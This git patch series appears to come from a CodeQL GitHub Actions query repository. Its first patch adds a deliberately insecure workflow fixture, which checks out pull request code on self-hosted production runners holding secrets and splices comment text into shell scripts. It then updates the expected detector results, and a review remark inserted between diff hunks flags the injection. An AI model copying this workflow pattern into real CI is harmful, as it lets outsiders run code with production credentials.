@@ -0,0 +1,253 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an 
interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." 
+ } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index 400adb446d2..418aeeea059 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
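Review bot: `Create image`, `Push image` and `Get pipeline info from comment` expand `${{ github.event.comment.body }}` directly into the `run:` script text, so the comment is substituted before the shell parses the script, while `Check comment keywords` in the same file already passes it through `env: COMMENT_BODY`. Applying that same pattern to these steps would give `env:` / `COMMENT_BODY: ${{ github.event.comment.body }}` and `model=$(echo "$COMMENT_BODY" | sed 's/.*kickoff //' | sed 's/ .*//')`. `Kickoff run` likewise puts `steps.pipeline-info.outputs.mdl`, which is derived from that comment, unquoted on the `trainer.py` command line. The `Checkout PR branch` step in `kickoff-pipeline` is also the only remote `uses:` in the file referenced by tag (`actions/checkout@v4`) instead of a commit SHA. If these are kept verbatim so the fixture mirrors a real workflow, a trailing comment noting that they are outside what the CWE-367 test asserts would make the intent clear.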
@@ -5,12 +5,105 @@ edges | .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | -| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | -| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | -| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment1.yml:16:10:22:7 | Uses Step | .github/workflows/deployment1.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment1.yml:22:10:27:7 | Uses Step | .github/workflows/deployment1.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment1.yml:27:10:30:7 | Run Step | .github/workflows/deployment1.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment2.yml:16:10:22:7 | Uses Step | .github/workflows/deployment2.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment2.yml:22:10:27:7 | Uses Step | .github/workflows/deployment2.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment2.yml:27:10:30:7 | Run Step | .github/workflows/deployment2.yml:30:10:31:53 | Run Step | | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | | .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | +| .github/workflows/test0.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test0.yml:28:9:32:6 | Uses Step | +| .github/workflows/test0.yml:28:9:32:6 | Uses Step | .github/workflows/test0.yml:32:9:34:2 | Run Step | +| .github/workflows/test0.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test0.yml:54:9:58:6 | Uses Step | +| 
.github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | +| .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | +| .github/workflows/test1.yml:32:7:47:4 | Run Step | .github/workflows/test1.yml:47:7:86:4 | Run Step: environment | +| .github/workflows/test1.yml:47:7:86:4 | Run Step: environment | .github/workflows/test1.yml:86:7:92:4 | Uses Step | +| .github/workflows/test1.yml:86:7:92:4 | Uses Step | .github/workflows/test1.yml:92:7:95:54 | Uses Step | +| .github/workflows/test2.yml:38:7:41:4 | Uses Step | .github/workflows/test2.yml:41:7:44:4 | Run Step | +| .github/workflows/test2.yml:41:7:44:4 | Run Step | .github/workflows/test2.yml:44:7:58:4 | Run Step | +| .github/workflows/test2.yml:44:7:58:4 | Run Step | .github/workflows/test2.yml:58:7:76:2 | Run Step: environment | +| .github/workflows/test2.yml:90:7:94:4 | Uses Step: comment-branch | .github/workflows/test2.yml:94:7:101:4 | Uses Step | +| .github/workflows/test2.yml:94:7:101:4 | Uses Step | .github/workflows/test2.yml:101:7:105:4 | Uses Step | +| .github/workflows/test2.yml:101:7:105:4 | Uses Step | .github/workflows/test2.yml:105:7:111:4 | Uses Step | +| .github/workflows/test2.yml:105:7:111:4 | Uses Step | .github/workflows/test2.yml:111:7:135:4 | Run Step: environment | +| .github/workflows/test2.yml:111:7:135:4 | Run Step: environment | .github/workflows/test2.yml:135:7:141:4 | Run Step: email | +| .github/workflows/test2.yml:135:7:141:4 | Run Step: email | .github/workflows/test2.yml:141:7:149:4 | Run Step: slack-id | +| .github/workflows/test2.yml:141:7:149:4 | Run Step: slack-id | .github/workflows/test2.yml:149:7:169:4 | Uses Step: slack-initiate | +| .github/workflows/test2.yml:149:7:169:4 | Uses Step: slack-initiate | .github/workflows/test2.yml:169:7:174:4 | Uses Step | +| .github/workflows/test2.yml:169:7:174:4 | Uses Step | .github/workflows/test2.yml:174:7:187:4 | Run Step | +| 
.github/workflows/test2.yml:174:7:187:4 | Run Step | .github/workflows/test2.yml:187:7:198:4 | Run Step | +| .github/workflows/test2.yml:187:7:198:4 | Run Step | .github/workflows/test2.yml:198:7:206:4 | Uses Step | +| .github/workflows/test2.yml:198:7:206:4 | Uses Step | .github/workflows/test2.yml:206:7:226:4 | Uses Step | +| .github/workflows/test2.yml:206:7:226:4 | Uses Step | .github/workflows/test2.yml:226:7:227:45 | Run Step | +| .github/workflows/test3.yml:38:7:56:4 | Run Step: environment | .github/workflows/test3.yml:56:7:60:4 | Uses Step: comment-branch | +| .github/workflows/test3.yml:56:7:60:4 | Uses Step: comment-branch | .github/workflows/test3.yml:60:7:65:4 | Uses Step | +| .github/workflows/test3.yml:60:7:65:4 | Uses Step | .github/workflows/test3.yml:65:7:68:4 | Uses Step | +| .github/workflows/test3.yml:65:7:68:4 | Uses Step | .github/workflows/test3.yml:68:7:83:2 | Run Step | +| .github/workflows/test3.yml:106:7:110:4 | Uses Step: comment-branch | .github/workflows/test3.yml:110:7:115:4 | Uses Step | +| .github/workflows/test3.yml:110:7:115:4 | Uses Step | .github/workflows/test3.yml:115:7:120:4 | Uses Step | +| .github/workflows/test3.yml:115:7:120:4 | Uses Step | .github/workflows/test3.yml:120:7:127:4 | Run Step | +| .github/workflows/test3.yml:120:7:127:4 | Run Step | .github/workflows/test3.yml:127:7:131:4 | Run Step | +| .github/workflows/test3.yml:127:7:131:4 | Run Step | .github/workflows/test3.yml:131:7:136:4 | Run Step | +| .github/workflows/test3.yml:131:7:136:4 | Run Step | .github/workflows/test3.yml:136:7:141:2 | Run Step | +| .github/workflows/test3.yml:169:7:173:4 | Uses Step: comment-branch | .github/workflows/test3.yml:173:7:180:4 | Uses Step | +| .github/workflows/test3.yml:173:7:180:4 | Uses Step | .github/workflows/test3.yml:180:7:185:4 | Uses Step | +| .github/workflows/test3.yml:180:7:185:4 | Uses Step | .github/workflows/test3.yml:185:7:197:4 | Run Step: pipeline-info | +| .github/workflows/test3.yml:185:7:197:4 | Run 
Step: pipeline-info | .github/workflows/test3.yml:197:7:203:4 | Run Step: email | +| .github/workflows/test3.yml:197:7:203:4 | Run Step: email | .github/workflows/test3.yml:203:7:211:4 | Run Step: slack-id | +| .github/workflows/test3.yml:203:7:211:4 | Run Step: slack-id | .github/workflows/test3.yml:211:7:231:4 | Uses Step: slack-initiate | +| .github/workflows/test3.yml:211:7:231:4 | Uses Step: slack-initiate | .github/workflows/test3.yml:231:7:236:4 | Uses Step | +| .github/workflows/test3.yml:231:7:236:4 | Uses Step | .github/workflows/test3.yml:236:7:242:4 | Run Step | +| .github/workflows/test3.yml:236:7:242:4 | Run Step | .github/workflows/test3.yml:242:7:250:4 | Uses Step | +| .github/workflows/test3.yml:242:7:250:4 | Uses Step | .github/workflows/test3.yml:250:7:270:4 | Uses Step | +| .github/workflows/test3.yml:250:7:270:4 | Uses Step | .github/workflows/test3.yml:270:7:271:45 | Run Step | +| .github/workflows/test4.yml:32:7:47:4 | Run Step | .github/workflows/test4.yml:47:7:79:4 | Run Step: environment | +| .github/workflows/test4.yml:47:7:79:4 | Run Step: environment | .github/workflows/test4.yml:79:7:85:4 | Uses Step | +| .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | +| .github/workflows/test5.yml:38:7:41:4 | Uses Step | .github/workflows/test5.yml:41:7:44:4 | Run Step | +| .github/workflows/test5.yml:41:7:44:4 | Run Step | .github/workflows/test5.yml:44:7:58:2 | Run Step | +| .github/workflows/test5.yml:72:7:76:4 | Uses Step: comment-branch | .github/workflows/test5.yml:76:7:83:4 | Uses Step | +| .github/workflows/test5.yml:76:7:83:4 | Uses Step | .github/workflows/test5.yml:83:7:87:4 | Uses Step | +| .github/workflows/test5.yml:83:7:87:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | +| .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:93:7:117:4 | Run Step: environment | +| .github/workflows/test5.yml:93:7:117:4 | Run Step: environment | 
.github/workflows/test5.yml:117:7:123:4 | Run Step: email | +| .github/workflows/test5.yml:117:7:123:4 | Run Step: email | .github/workflows/test5.yml:123:7:131:4 | Run Step: slack-id | +| .github/workflows/test5.yml:123:7:131:4 | Run Step: slack-id | .github/workflows/test5.yml:131:7:151:4 | Uses Step: slack-initiate | +| .github/workflows/test5.yml:131:7:151:4 | Uses Step: slack-initiate | .github/workflows/test5.yml:151:7:156:4 | Uses Step | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:180:7:188:4 | Uses Step | +| .github/workflows/test5.yml:180:7:188:4 | Uses Step | .github/workflows/test5.yml:188:7:208:4 | Uses Step | +| .github/workflows/test5.yml:188:7:208:4 | Uses Step | .github/workflows/test5.yml:208:7:209:45 | Run Step | +| .github/workflows/test6.yml:38:7:42:4 | Uses Step: comment-branch | .github/workflows/test6.yml:42:7:47:4 | Uses Step | +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | .github/workflows/test6.yml:47:7:50:4 | Uses Step | +| .github/workflows/test6.yml:47:7:50:4 | Uses Step | .github/workflows/test6.yml:50:7:65:2 | Run Step | +| .github/workflows/test6.yml:88:7:92:4 | Uses Step: comment-branch | .github/workflows/test6.yml:92:7:97:4 | Uses Step | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | .github/workflows/test6.yml:97:7:102:4 | Uses Step | +| .github/workflows/test6.yml:97:7:102:4 | Uses Step | .github/workflows/test6.yml:102:7:109:4 | Run Step | +| .github/workflows/test6.yml:102:7:109:4 | Run Step | .github/workflows/test6.yml:109:7:113:4 | Run Step | +| .github/workflows/test6.yml:109:7:113:4 | Run Step | .github/workflows/test6.yml:113:7:118:4 | Run Step | +| .github/workflows/test6.yml:113:7:118:4 | Run Step | .github/workflows/test6.yml:118:7:123:2 | Run 
Step | +| .github/workflows/test6.yml:151:7:155:4 | Uses Step: comment-branch | .github/workflows/test6.yml:155:7:162:4 | Uses Step | +| .github/workflows/test6.yml:155:7:162:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | +| .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:167:7:179:4 | Run Step: pipeline-info | +| .github/workflows/test6.yml:167:7:179:4 | Run Step: pipeline-info | .github/workflows/test6.yml:179:7:185:4 | Run Step: email | +| .github/workflows/test6.yml:179:7:185:4 | Run Step: email | .github/workflows/test6.yml:185:7:193:4 | Run Step: slack-id | +| .github/workflows/test6.yml:185:7:193:4 | Run Step: slack-id | .github/workflows/test6.yml:193:7:213:4 | Uses Step: slack-initiate | +| .github/workflows/test6.yml:193:7:213:4 | Uses Step: slack-initiate | .github/workflows/test6.yml:213:7:218:4 | Uses Step | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:224:7:232:4 | Uses Step | +| .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step | +| .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step | #select -| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | -| .github/workflows/deployment.yml:30:10:31:53 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. 
| .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | -| .github/workflows/label.yml:17:9:17:41 | Run Step | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | +| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. 
| +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected index e69de29bb2d..3a001efbbe8 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected @@ -0,0 +1,2 @@ +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 85b93765324..6a629764adc 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -301,9 +301,6 @@ edges | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | -| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | -| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | -| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | From b7aba1f081870794ddb7e3a439f9fd2906752f24 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 4 Oct 2024 18:05:58 +0200 Subject: [PATCH 0570/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0be2657c99e..91329e4f347 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.64 +version: 0.1.65 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ebdf6b364b2..1689480b56b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.64 +version: 0.1.65 groups: [actions, queries] suites: codeql-suites extractor: javascript From 524686ce37e14b397b29c3af9f79ba2c379f7aa3 Mon Sep 17 00:00:00 2001 
From: Paolo Tranquilli Date: Tue, 8 Oct 2024 16:39:21 +0200 Subject: [PATCH 0571/1267] Swift: make extractor compilable with Swift 6 --- swift/extractor/SwiftExtractor.cpp | 5 +++-- swift/extractor/infra/SwiftTagTraits.h | 6 +++++- swift/extractor/translators/ExprTranslator.cpp | 2 +- swift/third_party/load.bzl | 7 +++---- 4 files changed, 12 insertions(+), 8 deletions(-) diff --git a/swift/extractor/SwiftExtractor.cpp b/swift/extractor/SwiftExtractor.cpp index dc9dcfcfa7d..b0de6a7a2a4 100644 --- a/swift/extractor/SwiftExtractor.cpp +++ b/swift/extractor/SwiftExtractor.cpp @@ -152,10 +152,10 @@ static std::unordered_set extractDeclarations( } std::vector comments; - if (primaryFile && primaryFile->getBufferID().hasValue()) { + if (primaryFile && primaryFile->getBufferID()) { auto& sourceManager = compiler.getSourceMgr(); auto tokens = swift::tokenize(compiler.getInvocation().getLangOptions(), sourceManager, - primaryFile->getBufferID().getValue()); + *primaryFile->getBufferID()); for (auto& token : tokens) { if (token.getKind() == swift::tok::comment) { comments.push_back(token); @@ -188,6 +188,7 @@ static std::unordered_set collectInputFilenames(swift::CompilerInst std::unordered_set sourceFiles; const auto& inOuts = compiler.getInvocation().getFrontendOptions().InputsAndOutputs; for (auto& input : inOuts.getAllInputs()) { + LOG_INFO("> {}", input.getFileName()); if (input.getType() == swift::file_types::TY_Swift && (!inOuts.hasPrimaryInputs() || input.isPrimary())) { sourceFiles.insert(input.getFileName()); diff --git a/swift/extractor/infra/SwiftTagTraits.h b/swift/extractor/infra/SwiftTagTraits.h index fc3c6343ce5..7d3a670be6a 100644 --- a/swift/extractor/infra/SwiftTagTraits.h +++ b/swift/extractor/infra/SwiftTagTraits.h 
